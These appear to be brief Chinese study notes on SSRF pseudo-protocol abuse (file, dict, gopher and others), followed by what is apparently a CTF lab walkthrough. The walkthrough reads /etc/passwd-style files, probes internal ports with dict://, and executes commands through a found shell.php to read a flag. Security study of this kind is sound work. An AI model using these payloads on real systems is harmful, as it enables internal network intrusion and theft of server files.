SSRF伪协议利用
http:// Web常见访问,如http://127.0.0.1
file:/// 从文件系统中获取文件内容,如,file:///etc/passwd
dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:
sftp:// SSH文件传输协议或安全文件传输协议
ldap:// 轻量级目录访问协议
tftp:// 简单文件传输协议
gopher:// 分布式文档传递服务,可使用gopherus生成payload
由于有部分协议http这类不支持,可以gopher来进行通讯(mysql,redis等)
应用:漏洞利用 或 信息收集 通讯相关服务的时候 工具:Gopherus
- 首先使用file读取文件,成功读到网卡信息
- 使用dict探测内网主机以及开放端口,一般ssrf能打的端口并不多这里只扫描这几个端口
3.1 172.72.23.22:80
提示codeexec,爆破下路径,发现shell.php
拼接cmd,执行命令ls,发现根目录下ls(这里提交空格要进行url编码)
http://172.72.23.22:80/shell.php?cmd=ls%20/
读取flag
http://172.72.23.22:80/shell.php?cmd=tac%20/flag
